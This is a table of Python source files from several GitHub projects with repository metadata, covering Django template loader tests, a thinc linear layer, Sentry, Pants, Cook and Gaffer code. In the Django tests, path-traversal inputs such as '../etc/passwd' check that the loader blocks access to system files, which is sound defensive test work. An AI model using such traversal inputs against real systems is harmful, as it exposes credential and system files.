| text (string, lengths 4 to 1.02M) | meta (dict) |
|---|---|
import logging
import unittest
from nose.plugins.attrib import attr
from tests.cook import cli, util
@attr(cli=True)
@unittest.skipUnless(util.multi_cluster_tests_enabled(),
'Requires setting the COOK_MULTI_CLUSTER environment variable')
class MultiCookCliTest(unittest.TestCase):
_multiprocess_can_split_ = True
def setUp(self):
self.cook_url_1 = util.retrieve_cook_url()
self.cook_url_2 = util.retrieve_cook_url('COOK_SCHEDULER_URL_2', 'http://localhost:22321')
self.logger = logging.getLogger(__name__)
util.wait_for_cook(self.cook_url_1)
util.wait_for_cook(self.cook_url_2)
def test_federated_query(self):
# Submit to cluster #1
cp, uuids = cli.submit('ls', self.cook_url_1)
self.assertEqual(0, cp.returncode, cp.stderr)
uuid_1 = uuids[0]
# Submit to cluster #2
cp, uuids = cli.submit('ls', self.cook_url_2)
self.assertEqual(0, cp.returncode, cp.stderr)
uuid_2 = uuids[0]
# Single query for both jobs, federated across clusters
config = {'clusters': [{'name': 'cook1', 'url': self.cook_url_1},
{'name': 'cook2', 'url': self.cook_url_2}]}
with cli.temp_config_file(config) as path:
cp = cli.wait([uuid_1, uuid_2], flags='--config %s' % path)
self.assertEqual(0, cp.returncode, cp.stderr)
cp, jobs = cli.show_json([uuid_1, uuid_2], flags='--config %s' % path)
uuids = [job['uuid'] for job in jobs]
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertEqual(2, len(jobs), jobs)
self.assertIn(str(uuid_1), uuids)
self.assertIn(str(uuid_2), uuids)
self.assertEqual('completed', jobs[0]['status'])
self.assertEqual('completed', jobs[1]['status'])
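For reference, a minimal standalone sketch of the multi-cluster configuration data the test builds. The file format, file name, and the first URL are assumptions for illustration; only the `clusters` structure and the second cluster's default URL come from the test above:

```python
import json

# Placeholder multi-cluster Cook CLI configuration mirroring the dict built in the test.
config = {
    "clusters": [
        {"name": "cook1", "url": "http://localhost:12321"},  # placeholder URL
        {"name": "cook2", "url": "http://localhost:22321"},  # default from the test's setUp
    ]
}

with open("cook-clusters.json", "w") as f:  # hypothetical file name
    json.dump(config, f, indent=2)
```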
| {
"content_hash": "ad3e5ef246e63db99ff9cbe002ae979c",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 98,
"avg_line_length": 40.630434782608695,
"alnum_prop": 0.599250936329588,
"repo_name": "m4ce/Cook",
"id": "d389c95c8036836394a5b243b68a0f4e7eb561af",
"size": "1869",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "integration/tests/cook/test_cli_multi_cook.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Clojure",
"bytes": "1092671"
},
{
"name": "Java",
"bytes": "159333"
},
{
"name": "Python",
"bytes": "205274"
},
{
"name": "Shell",
"bytes": "15716"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
from sentry.api.bases.avatar import AvatarMixin
from sentry.api.bases.organization import OrganizationEndpoint
from sentry.models import OrganizationAvatar
class OrganizationAvatarEndpoint(AvatarMixin, OrganizationEndpoint):
object_type = "organization"
model = OrganizationAvatar
def get_avatar_filename(self, obj):
# for consistency with organization details endpoint
return u"{}.png".format(obj.slug)
| {
"content_hash": "ee2097682b4dd47f5240d9b04bccde58",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 68,
"avg_line_length": 33.92857142857143,
"alnum_prop": 0.7768421052631579,
"repo_name": "mvaled/sentry",
"id": "2114eb459d196bdd07fc1d4438babc58668fb9c6",
"size": "475",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "src/sentry/api/endpoints/organization_avatar.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "226439"
},
{
"name": "Dockerfile",
"bytes": "6431"
},
{
"name": "HTML",
"bytes": "173429"
},
{
"name": "JavaScript",
"bytes": "9314175"
},
{
"name": "Lua",
"bytes": "65885"
},
{
"name": "Makefile",
"bytes": "9225"
},
{
"name": "Python",
"bytes": "50385401"
},
{
"name": "Ruby",
"bytes": "168"
},
{
"name": "Shell",
"bytes": "5685"
},
{
"name": "TypeScript",
"bytes": "773664"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
import os.path
import sys
import tempfile
import types
import unittest
from contextlib import contextmanager
from django.template import Context, TemplateDoesNotExist
from django.template.engine import Engine
from django.test import SimpleTestCase, ignore_warnings, override_settings
from django.utils import six
from django.utils.deprecation import RemovedInDjango20Warning
from .utils import TEMPLATE_DIR
try:
import pkg_resources
except ImportError:
pkg_resources = None
class CachedLoaderTests(SimpleTestCase):
def setUp(self):
self.engine = Engine(
dirs=[TEMPLATE_DIR],
loaders=[
('django.template.loaders.cached.Loader', [
'django.template.loaders.filesystem.Loader',
]),
],
)
def test_get_template(self):
template = self.engine.get_template('index.html')
self.assertEqual(template.origin.name, os.path.join(TEMPLATE_DIR, 'index.html'))
self.assertEqual(template.origin.template_name, 'index.html')
self.assertEqual(template.origin.loader, self.engine.template_loaders[0].loaders[0])
cache = self.engine.template_loaders[0].get_template_cache
self.assertEqual(cache['index.html'], template)
# Run a second time from cache
template = self.engine.get_template('index.html')
self.assertEqual(template.origin.name, os.path.join(TEMPLATE_DIR, 'index.html'))
self.assertEqual(template.origin.template_name, 'index.html')
self.assertEqual(template.origin.loader, self.engine.template_loaders[0].loaders[0])
def test_get_template_missing(self):
with self.assertRaises(TemplateDoesNotExist):
self.engine.get_template('doesnotexist.html')
e = self.engine.template_loaders[0].get_template_cache['doesnotexist.html']
self.assertEqual(e.args[0], 'doesnotexist.html')
@ignore_warnings(category=RemovedInDjango20Warning)
def test_load_template(self):
loader = self.engine.template_loaders[0]
template, origin = loader.load_template('index.html')
self.assertEqual(template.origin.template_name, 'index.html')
cache = self.engine.template_loaders[0].template_cache
self.assertEqual(cache['index.html'][0], template)
# Run a second time from cache
loader = self.engine.template_loaders[0]
source, name = loader.load_template('index.html')
self.assertEqual(template.origin.template_name, 'index.html')
@ignore_warnings(category=RemovedInDjango20Warning)
def test_load_template_missing(self):
"""
#19949 -- TemplateDoesNotExist exceptions should be cached.
"""
loader = self.engine.template_loaders[0]
self.assertFalse('missing.html' in loader.template_cache)
with self.assertRaises(TemplateDoesNotExist):
loader.load_template("missing.html")
self.assertEqual(
loader.template_cache["missing.html"],
TemplateDoesNotExist,
"Cached loader failed to cache the TemplateDoesNotExist exception",
)
@ignore_warnings(category=RemovedInDjango20Warning)
def test_load_nonexistent_cached_template(self):
loader = self.engine.template_loaders[0]
template_name = 'nonexistent.html'
# fill the template cache
with self.assertRaises(TemplateDoesNotExist):
loader.find_template(template_name)
with self.assertRaisesMessage(TemplateDoesNotExist, template_name):
loader.get_template(template_name)
def test_templatedir_caching(self):
"""
#13573 -- Template directories should be part of the cache key.
"""
# Retrieve a template specifying a template directory to check
t1, name = self.engine.find_template('test.html', (os.path.join(TEMPLATE_DIR, 'first'),))
# Now retrieve the same template name, but from a different directory
t2, name = self.engine.find_template('test.html', (os.path.join(TEMPLATE_DIR, 'second'),))
# The two templates should not have the same content
self.assertNotEqual(t1.render(Context({})), t2.render(Context({})))
@unittest.skipUnless(pkg_resources, 'setuptools is not installed')
class EggLoaderTests(SimpleTestCase):
@contextmanager
def create_egg(self, name, resources):
"""
Creates a mock egg with a list of resources.
name: The name of the module.
resources: A dictionary of template names mapped to file-like objects.
"""
if six.PY2:
name = name.encode('utf-8')
class MockLoader(object):
pass
class MockProvider(pkg_resources.NullProvider):
def __init__(self, module):
pkg_resources.NullProvider.__init__(self, module)
self.module = module
def _has(self, path):
return path in self.module._resources
def _isdir(self, path):
return False
def get_resource_stream(self, manager, resource_name):
return self.module._resources[resource_name]
def _get(self, path):
return self.module._resources[path].read()
def _fn(self, base, resource_name):
return os.path.normcase(resource_name)
egg = types.ModuleType(name)
egg.__loader__ = MockLoader()
egg.__path__ = ['/some/bogus/path/']
egg.__file__ = '/some/bogus/path/__init__.pyc'
egg._resources = resources
sys.modules[name] = egg
pkg_resources._provider_factories[MockLoader] = MockProvider
try:
yield
finally:
del sys.modules[name]
del pkg_resources._provider_factories[MockLoader]
@classmethod
@ignore_warnings(category=RemovedInDjango20Warning)
def setUpClass(cls):
cls.engine = Engine(loaders=[
'django.template.loaders.eggs.Loader',
])
cls.loader = cls.engine.template_loaders[0]
super(EggLoaderTests, cls).setUpClass()
def test_get_template(self):
templates = {
os.path.normcase('templates/y.html'): six.StringIO("y"),
}
with self.create_egg('egg', templates):
with override_settings(INSTALLED_APPS=['egg']):
template = self.engine.get_template("y.html")
self.assertEqual(template.origin.name, 'egg:egg:templates/y.html')
self.assertEqual(template.origin.template_name, 'y.html')
self.assertEqual(template.origin.loader, self.engine.template_loaders[0])
output = template.render(Context({}))
self.assertEqual(output, "y")
@ignore_warnings(category=RemovedInDjango20Warning)
def test_load_template_source(self):
loader = self.engine.template_loaders[0]
templates = {
os.path.normcase('templates/y.html'): six.StringIO("y"),
}
with self.create_egg('egg', templates):
with override_settings(INSTALLED_APPS=['egg']):
source, name = loader.load_template_source('y.html')
self.assertEqual(source.strip(), 'y')
self.assertEqual(name, 'egg:egg:templates/y.html')
def test_non_existing(self):
"""
Template loading fails if the template is not in the egg.
"""
with self.create_egg('egg', {}):
with override_settings(INSTALLED_APPS=['egg']):
with self.assertRaises(TemplateDoesNotExist):
self.engine.get_template('not-existing.html')
def test_not_installed(self):
"""
Template loading fails if the egg is not in INSTALLED_APPS.
"""
templates = {
os.path.normcase('templates/y.html'): six.StringIO("y"),
}
with self.create_egg('egg', templates):
with self.assertRaises(TemplateDoesNotExist):
self.engine.get_template('y.html')
class FileSystemLoaderTests(SimpleTestCase):
@classmethod
def setUpClass(cls):
cls.engine = Engine(dirs=[TEMPLATE_DIR])
super(FileSystemLoaderTests, cls).setUpClass()
@contextmanager
def set_dirs(self, dirs):
original_dirs = self.engine.dirs
self.engine.dirs = dirs
try:
yield
finally:
self.engine.dirs = original_dirs
@contextmanager
def source_checker(self, dirs):
loader = self.engine.template_loaders[0]
def check_sources(path, expected_sources):
expected_sources = [os.path.abspath(s) for s in expected_sources]
self.assertEqual(
[origin.name for origin in loader.get_template_sources(path)],
expected_sources,
)
with self.set_dirs(dirs):
yield check_sources
def test_get_template(self):
template = self.engine.get_template('index.html')
self.assertEqual(template.origin.name, os.path.join(TEMPLATE_DIR, 'index.html'))
self.assertEqual(template.origin.template_name, 'index.html')
self.assertEqual(template.origin.loader, self.engine.template_loaders[0])
self.assertEqual(template.origin.loader_name, 'django.template.loaders.filesystem.Loader')
@ignore_warnings(category=RemovedInDjango20Warning)
def test_load_template_source(self):
loader = self.engine.template_loaders[0]
source, name = loader.load_template_source('index.html')
self.assertEqual(source.strip(), 'index')
self.assertEqual(name, os.path.join(TEMPLATE_DIR, 'index.html'))
def test_directory_security(self):
with self.source_checker(['/dir1', '/dir2']) as check_sources:
check_sources('index.html', ['/dir1/index.html', '/dir2/index.html'])
check_sources('/etc/passwd', [])
check_sources('etc/passwd', ['/dir1/etc/passwd', '/dir2/etc/passwd'])
check_sources('../etc/passwd', [])
check_sources('../../../etc/passwd', [])
check_sources('/dir1/index.html', ['/dir1/index.html'])
check_sources('../dir2/index.html', ['/dir2/index.html'])
check_sources('/dir1blah', [])
check_sources('../dir1blah', [])
def test_unicode_template_name(self):
with self.source_checker(['/dir1', '/dir2']) as check_sources:
# UTF-8 bytestrings are permitted.
check_sources(b'\xc3\x85ngstr\xc3\xb6m', ['/dir1/Ångström', '/dir2/Ångström'])
# Unicode strings are permitted.
check_sources('Ångström', ['/dir1/Ångström', '/dir2/Ångström'])
def test_utf8_bytestring(self):
"""
Invalid UTF-8 encoding in bytestrings should raise a useful error
"""
engine = Engine()
loader = engine.template_loaders[0]
with self.assertRaises(UnicodeDecodeError):
list(loader.get_template_sources(b'\xc3\xc3', ['/dir1']))
def test_unicode_dir_name(self):
with self.source_checker([b'/Stra\xc3\x9fe']) as check_sources:
check_sources('Ångström', ['/Straße/Ångström'])
check_sources(b'\xc3\x85ngstr\xc3\xb6m', ['/Straße/Ångström'])
@unittest.skipUnless(
os.path.normcase('/TEST') == os.path.normpath('/test'),
"This test only runs on case-sensitive file systems.",
)
def test_case_sensitivity(self):
with self.source_checker(['/dir1', '/DIR2']) as check_sources:
check_sources('index.html', ['/dir1/index.html', '/DIR2/index.html'])
check_sources('/DIR1/index.HTML', ['/DIR1/index.HTML'])
def test_file_does_not_exist(self):
with self.assertRaises(TemplateDoesNotExist):
self.engine.get_template('doesnotexist.html')
@unittest.skipIf(
sys.platform == 'win32',
"Python on Windows doesn't have working os.chmod().",
)
def test_permissions_error(self):
with tempfile.NamedTemporaryFile() as tmpfile:
tmpdir = os.path.dirname(tmpfile.name)
tmppath = os.path.join(tmpdir, tmpfile.name)
os.chmod(tmppath, 0o0222)
with self.set_dirs([tmpdir]):
with self.assertRaisesMessage(IOError, 'Permission denied'):
self.engine.get_template(tmpfile.name)
def test_notafile_error(self):
with self.assertRaises(IOError):
self.engine.get_template('first')
class AppDirectoriesLoaderTests(SimpleTestCase):
@classmethod
def setUpClass(cls):
cls.engine = Engine(
loaders=['django.template.loaders.app_directories.Loader'],
)
super(AppDirectoriesLoaderTests, cls).setUpClass()
@override_settings(INSTALLED_APPS=['template_tests'])
def test_get_template(self):
template = self.engine.get_template('index.html')
self.assertEqual(template.origin.name, os.path.join(TEMPLATE_DIR, 'index.html'))
self.assertEqual(template.origin.template_name, 'index.html')
self.assertEqual(template.origin.loader, self.engine.template_loaders[0])
@ignore_warnings(category=RemovedInDjango20Warning)
@override_settings(INSTALLED_APPS=['template_tests'])
def test_load_template_source(self):
loader = self.engine.template_loaders[0]
source, name = loader.load_template_source('index.html')
self.assertEqual(source.strip(), 'index')
self.assertEqual(name, os.path.join(TEMPLATE_DIR, 'index.html'))
@override_settings(INSTALLED_APPS=[])
def test_not_installed(self):
with self.assertRaises(TemplateDoesNotExist):
self.engine.get_template('index.html')
class LocmemLoaderTests(SimpleTestCase):
@classmethod
def setUpClass(cls):
cls.engine = Engine(
loaders=[('django.template.loaders.locmem.Loader', {
'index.html': 'index',
})],
)
super(LocmemLoaderTests, cls).setUpClass()
def test_get_template(self):
template = self.engine.get_template('index.html')
self.assertEqual(template.origin.name, 'index.html')
self.assertEqual(template.origin.template_name, 'index.html')
self.assertEqual(template.origin.loader, self.engine.template_loaders[0])
@ignore_warnings(category=RemovedInDjango20Warning)
def test_load_template_source(self):
loader = self.engine.template_loaders[0]
source, name = loader.load_template_source('index.html')
self.assertEqual(source.strip(), 'index')
self.assertEqual(name, 'index.html')
| {
"content_hash": "179063ea53a9448a197053d73c8c3924",
"timestamp": "",
"source": "github",
"line_count": 387,
"max_line_length": 98,
"avg_line_length": 37.917312661498705,
"alnum_prop": 0.6332969878697016,
"repo_name": "rynomster/django",
"id": "11f20c6debffd098311ecefe18885fff1ef04d3f",
"size": "14716",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/template_tests/test_loaders.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "52372"
},
{
"name": "HTML",
"bytes": "170531"
},
{
"name": "JavaScript",
"bytes": "256023"
},
{
"name": "Makefile",
"bytes": "125"
},
{
"name": "Python",
"bytes": "11518250"
},
{
"name": "Shell",
"bytes": "809"
},
{
"name": "Smarty",
"bytes": "130"
}
],
"symlink_target": ""
} |
import os
def _get_cache_dir_path():
return os.path.join(os.path.expanduser('~/.local/share'), 'atcoder-tools')
def get_cache_file_path(filename: str):
return os.path.join(_get_cache_dir_path(), filename)
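A quick usage sketch for the helpers above; the cache file name is made up for illustration:

```python
# Joins the cache directory (~/.local/share/atcoder-tools) with the given name.
path = get_cache_file_path("session.json")  # hypothetical file name
print(path)  # e.g. /home/alice/.local/share/atcoder-tools/session.json
```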
| {
"content_hash": "31529f4de921e0bb536da085185d76b6",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 78,
"avg_line_length": 24.11111111111111,
"alnum_prop": 0.6866359447004609,
"repo_name": "kyuridenamida/atcoder-tools",
"id": "5222f6e99f08b87739e3450139424954dbca207f",
"size": "217",
"binary": false,
"copies": "2",
"ref": "refs/heads/stable",
"path": "atcodertools/fileutils/artifacts_cache.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C#",
"bytes": "16188"
},
{
"name": "C++",
"bytes": "21899"
},
{
"name": "CSS",
"bytes": "719"
},
{
"name": "D",
"bytes": "6304"
},
{
"name": "Go",
"bytes": "6875"
},
{
"name": "HTML",
"bytes": "341695"
},
{
"name": "Java",
"bytes": "7287"
},
{
"name": "JavaScript",
"bytes": "64422"
},
{
"name": "Julia",
"bytes": "10348"
},
{
"name": "Nim",
"bytes": "7595"
},
{
"name": "Python",
"bytes": "262284"
},
{
"name": "Roff",
"bytes": "3669"
},
{
"name": "Rust",
"bytes": "12241"
},
{
"name": "SCSS",
"bytes": "45"
},
{
"name": "Shell",
"bytes": "1320"
},
{
"name": "Swift",
"bytes": "7732"
},
{
"name": "TypeScript",
"bytes": "48032"
}
],
"symlink_target": ""
} |
import json
from pants.backend.experimental.java.register import rules as java_rules
from pants.backend.java.dependency_inference.types import JavaSourceDependencyAnalysis
from pants.backend.java.target_types import JavaFieldSet
from pants.core.util_rules.source_files import SourceFilesRequest
from pants.engine.console import Console
from pants.engine.goal import Goal, GoalSubsystem
from pants.engine.internals.selectors import Get, MultiGet
from pants.engine.rules import collect_rules, goal_rule
from pants.engine.target import Targets
from pants.jvm.goals import debug_goals
class DumpJavaSourceAnalysisSubsystem(GoalSubsystem):
name = "java-dump-source-analysis"
help = "Dump source analysis for java_source[s] targets."
class DumpJavaSourceAnalysis(Goal):
subsystem_cls = DumpJavaSourceAnalysisSubsystem
environment_behavior = Goal.EnvironmentBehavior.LOCAL_ONLY # TODO(#17129) — Migrate this.
@goal_rule
async def dump_java_source_analysis(targets: Targets, console: Console) -> DumpJavaSourceAnalysis:
java_source_field_sets = [
JavaFieldSet.create(tgt) for tgt in targets if JavaFieldSet.is_applicable(tgt)
]
java_source_analysis = await MultiGet(
Get(JavaSourceDependencyAnalysis, SourceFilesRequest([fs.sources]))
for fs in java_source_field_sets
)
java_source_analysis_json = [
{"address": str(fs.address), **analysis.to_debug_json_dict()}
for (fs, analysis) in zip(java_source_field_sets, java_source_analysis)
]
console.print_stdout(json.dumps(java_source_analysis_json))
return DumpJavaSourceAnalysis(exit_code=0)
def rules():
return [
*collect_rules(),
*java_rules(),
*debug_goals.rules(),
]
| {
"content_hash": "6412ccb1a4a884218e755d75c4c50617",
"timestamp": "",
"source": "github",
"line_count": 47,
"max_line_length": 98,
"avg_line_length": 37.02127659574468,
"alnum_prop": 0.7477011494252873,
"repo_name": "pantsbuild/pants",
"id": "f1f5493588472a5c693f94deebd26a4c8616a404",
"size": "1874",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "src/python/pants/backend/java/goals/debug_goals.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "688"
},
{
"name": "Dockerfile",
"bytes": "1132"
},
{
"name": "Go",
"bytes": "67315"
},
{
"name": "Java",
"bytes": "97190"
},
{
"name": "Kotlin",
"bytes": "6433"
},
{
"name": "Mustache",
"bytes": "3771"
},
{
"name": "Python",
"bytes": "7582858"
},
{
"name": "Rust",
"bytes": "1657282"
},
{
"name": "Scala",
"bytes": "21950"
},
{
"name": "Shell",
"bytes": "31400"
},
{
"name": "Starlark",
"bytes": "76892"
}
],
"symlink_target": ""
} |
"""
Given an integer, write a function to determine if it is a power of two.
"""
__author__ = 'Daniel'
class Solution:
def isPowerOfTwo(self, n):
"""
Bit manipulation
:type n: int
:rtype: bool
"""
if n <= 0:
return False
return n & (n-1) == 0
| {
"content_hash": "2a513e52197c448f54daab721ad6f29c",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 72,
"avg_line_length": 18.647058823529413,
"alnum_prop": 0.49842271293375395,
"repo_name": "ee08b397/LeetCode-4",
"id": "88c22349a06b5b0740f437d1595aca73001d23e0",
"size": "317",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "231 Power of Two.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "555639"
}
],
"symlink_target": ""
} |
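A brief sanity check of the bit trick in the power-of-two solution above: a positive power of two has exactly one set bit, and `n & (n - 1)` clears the lowest set bit, so the expression is zero only for powers of two. The snippet below is purely illustrative:

```python
s = Solution()
assert s.isPowerOfTwo(1)        # 2**0, binary 0b1
assert s.isPowerOfTwo(16)       # single bit set, 0b10000
assert not s.isPowerOfTwo(6)    # 0b110 has two bits set
assert not s.isPowerOfTwo(0)    # zero and negatives are rejected up front
```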
from typing import Tuple, Callable, Optional, cast
from ..model import Model
from ..config import registry
from ..types import Floats1d, Floats2d
from ..initializers import glorot_uniform_init, zero_init
from ..util import get_width, partial
InT = Floats2d
OutT = Floats2d
@registry.layers("Linear.v1")
def Linear(
nO: Optional[int] = None,
nI: Optional[int] = None,
*,
init_W: Callable = glorot_uniform_init,
init_b: Callable = zero_init,
) -> Model[InT, OutT]:
"""Multiply inputs by a weights matrix and adds a bias vector."""
return Model(
"linear",
forward,
init=partial(init, init_W, init_b),
dims={"nO": nO, "nI": nI},
params={"W": None, "b": None},
)
def forward(model: Model[InT, OutT], X: InT, is_train: bool) -> Tuple[OutT, Callable]:
W = cast(Floats2d, model.get_param("W"))
b = cast(Floats1d, model.get_param("b"))
Y = model.ops.gemm(X, W, trans2=True)
Y += b
def backprop(dY: OutT) -> InT:
model.inc_grad("b", dY.sum(axis=0))
model.inc_grad("W", model.ops.gemm(dY, X, trans1=True))
return model.ops.gemm(dY, W)
return Y, backprop
def init(
init_W: Callable,
init_b: Callable,
model: Model[InT, OutT],
X: Optional[InT] = None,
Y: Optional[OutT] = None,
) -> None:
if X is not None:
model.set_dim("nI", get_width(X))
if Y is not None:
model.set_dim("nO", get_width(Y))
model.set_param("W", init_W(model.ops, (model.get_dim("nO"), model.get_dim("nI"))))
model.set_param("b", init_b(model.ops, (model.get_dim("nO"),)))
| {
"content_hash": "650cce39013e749b8a6c8f6e201ab5bf",
"timestamp": "",
"source": "github",
"line_count": 58,
"max_line_length": 87,
"avg_line_length": 27.775862068965516,
"alnum_prop": 0.6039726877715704,
"repo_name": "explosion/thinc",
"id": "c6dc1b350b15f457f534aa21129604b58d8b5dbf",
"size": "1611",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "thinc/layers/linear.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "14601"
},
{
"name": "Cuda",
"bytes": "23473"
},
{
"name": "Cython",
"bytes": "77312"
},
{
"name": "Dockerfile",
"bytes": "430"
},
{
"name": "JavaScript",
"bytes": "57198"
},
{
"name": "Python",
"bytes": "668790"
},
{
"name": "Sass",
"bytes": "29988"
},
{
"name": "Shell",
"bytes": "364"
}
],
"symlink_target": ""
} |
import requests
import ConfigParser
from getpass import getpass
class Setup:
URLS = {
"1": "https://www.fireservicerota.co.uk",
"2": "https://www.brandweerrooster.nl"
}
CONFIG_FILE = '.local_settings.ini'
domain = None
api_key = None
def __init__(self):
pass
def get_settings(self):
self.read_configuration()
while(not self.is_configured()):
self.ask_user()
self.write_configuration()
return {'domain': self.domain, 'api_key': self.api_key}
def is_configured(self):
return self.domain != None and self.api_key != None
def read_configuration(self):
config = ConfigParser.ConfigParser()
config.read(self.CONFIG_FILE)
try:
self.domain = config.get('Main', 'Domain')
self.api_key = config.get('Main', 'APIKey')
finally:
return
def write_configuration(self):
config = ConfigParser.ConfigParser()
config.add_section('Main')
config.set('Main', 'Domain', self.domain)
config.set('Main', 'APIKey', self.api_key)
cfgfile = open('.local_settings.ini', 'w')
config.write(cfgfile)
cfgfile.close()
def get_api_key(self):
url_template = '{}/api/sessions'
url = url_template.format(self.domain)
result = requests.post(url, json = {'user_login': self.email, 'password': self.password})
response_json = result.json()
success = response_json['success']
if(success):
return response_json['auth_token']
else:
return None
def ask_user(self):
while True:
self.ask_system_choice()
self.ask_email()
self.ask_password()
self.api_key = self.get_api_key()
if self.api_key:
print "Logged in"
print
return
else:
print
print "Invalid email or password. Please try again"
print
def ask_email(self):
self.email = raw_input("Please enter your email address: ")
def ask_password(self):
self.password = getpass("Please enter your password: ")
def ask_system_choice(self):
print "Please select the system you use"
print "1. FireServiceRota (international)"
print "2. Brandweerrooster (Netherlands)"
while True:
self.system_choice = raw_input("Please enter 1 or 2: ")
if self.system_choice in ["1", "2"]:
break
self.domain = self.URLS[self.system_choice]
return
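A short usage sketch of the `Setup` class above; what the caller does with the returned credentials afterwards is not shown:

```python
# Prompts for system choice, email and password on first run, validates them
# against /api/sessions, then caches the result in .local_settings.ini.
settings = Setup().get_settings()
domain, api_key = settings['domain'], settings['api_key']
```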
| {
"content_hash": "67edf8ddf3592ccc10ce4651433df890",
"timestamp": "",
"source": "github",
"line_count": 95,
"max_line_length": 93,
"avg_line_length": 24.83157894736842,
"alnum_prop": 0.6299279355659178,
"repo_name": "rhomeister/firepi",
"id": "5b229462fa8c147896abfdf6592cf246b8ca0220",
"size": "2377",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "firepi/setup.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "16251"
}
],
"symlink_target": ""
} |
import unittest
import os
import imath
import IECore
import Gaffer
import GafferTest
class MetadataAlgoTest( GafferTest.TestCase ) :
def testReadOnly( self ) :
n = GafferTest.AddNode()
self.assertEqual( Gaffer.MetadataAlgo.getReadOnly( n ), False )
self.assertEqual( Gaffer.MetadataAlgo.getReadOnly( n["op1"] ), False )
self.assertEqual( Gaffer.MetadataAlgo.readOnly( n ), False )
self.assertEqual( Gaffer.MetadataAlgo.readOnly( n["op1"] ), False )
Gaffer.MetadataAlgo.setReadOnly( n["op1"], True )
self.assertEqual( Gaffer.MetadataAlgo.getReadOnly( n ), False )
self.assertEqual( Gaffer.MetadataAlgo.getReadOnly( n["op1"] ), True )
self.assertEqual( Gaffer.MetadataAlgo.readOnly( n ), False )
self.assertEqual( Gaffer.MetadataAlgo.readOnly( n["op1"] ), True )
Gaffer.MetadataAlgo.setReadOnly( n, True )
self.assertEqual( Gaffer.MetadataAlgo.getReadOnly( n ), True )
self.assertEqual( Gaffer.MetadataAlgo.getReadOnly( n["op1"] ), True )
self.assertEqual( Gaffer.MetadataAlgo.readOnly( n ), True )
self.assertEqual( Gaffer.MetadataAlgo.readOnly( n["op1"] ), True )
Gaffer.MetadataAlgo.setReadOnly( n["op1"], False )
self.assertEqual( Gaffer.MetadataAlgo.getReadOnly( n ), True )
self.assertEqual( Gaffer.MetadataAlgo.getReadOnly( n["op1"] ), False )
self.assertEqual( Gaffer.MetadataAlgo.readOnly( n ), True )
self.assertEqual( Gaffer.MetadataAlgo.readOnly( n["op1"] ), True )
with self.assertRaisesRegex( Exception, r"did not match C\+\+ signature" ) :
Gaffer.MetadataAlgo.readOnly( None )
def testReadOnlyReason( self ) :
b = Gaffer.Box()
b["b"] = Gaffer.Box()
n = GafferTest.AddNode()
b["b"]["n"] = n
self.assertIsNone( Gaffer.MetadataAlgo.readOnlyReason( n ) )
self.assertIsNone( Gaffer.MetadataAlgo.readOnlyReason( n["op1"] ) )
Gaffer.MetadataAlgo.setReadOnly( b, True )
self.assertEqual( Gaffer.MetadataAlgo.readOnlyReason( n ), b )
self.assertEqual( Gaffer.MetadataAlgo.readOnlyReason( n["op1"] ), b )
Gaffer.MetadataAlgo.setReadOnly( b["b"], True )
self.assertEqual( Gaffer.MetadataAlgo.readOnlyReason( n["op1"] ), b )
Gaffer.MetadataAlgo.setReadOnly( b["b"]["n"], True )
self.assertEqual( Gaffer.MetadataAlgo.readOnlyReason( n["op1"] ), b )
Gaffer.MetadataAlgo.setReadOnly( b["b"]["n"]["op1"], True )
self.assertEqual( Gaffer.MetadataAlgo.readOnlyReason( n["op1"] ), b )
Gaffer.MetadataAlgo.setReadOnly( b, False )
self.assertEqual( Gaffer.MetadataAlgo.readOnlyReason( n["op1"] ), b["b"] )
Gaffer.MetadataAlgo.setReadOnly( b["b"], False )
self.assertEqual( Gaffer.MetadataAlgo.readOnlyReason( n["op1"] ), n )
Gaffer.MetadataAlgo.setReadOnly( b["b"]["n"], False )
self.assertEqual( Gaffer.MetadataAlgo.readOnlyReason( n["op1"] ), n["op1"] )
Gaffer.MetadataAlgo.setReadOnly( b["b"]["n"]["op1"], False )
self.assertIsNone( Gaffer.MetadataAlgo.readOnlyReason( n["op1"] ) )
with self.assertRaisesRegex( Exception, r"did not match C\+\+ signature" ) :
Gaffer.MetadataAlgo.readOnlyReason( None )
def testChildNodesAreReadOnly( self ) :
b = Gaffer.Box()
self.assertEqual( Gaffer.MetadataAlgo.getReadOnly( b ), False )
self.assertEqual( Gaffer.MetadataAlgo.getChildNodesAreReadOnly( b ), False )
self.assertEqual( Gaffer.MetadataAlgo.readOnly( b ), False )
p1 = Gaffer.IntPlug( "boxPlug", Gaffer.Plug.Direction.In )
b.addChild( p1 )
self.assertEqual( Gaffer.MetadataAlgo.getReadOnly( p1 ), False )
self.assertEqual( Gaffer.MetadataAlgo.readOnly( p1 ), False )
n = GafferTest.AddNode()
self.assertEqual( Gaffer.MetadataAlgo.getReadOnly( n ), False )
self.assertEqual( Gaffer.MetadataAlgo.getReadOnly( n["op1"] ), False )
self.assertEqual( Gaffer.MetadataAlgo.readOnly( n ), False )
self.assertEqual( Gaffer.MetadataAlgo.readOnly( n["op1"] ), False )
b.addChild( n )
self.assertEqual( Gaffer.MetadataAlgo.getReadOnly( n ), False )
self.assertEqual( Gaffer.MetadataAlgo.getReadOnly( n["op1"] ), False )
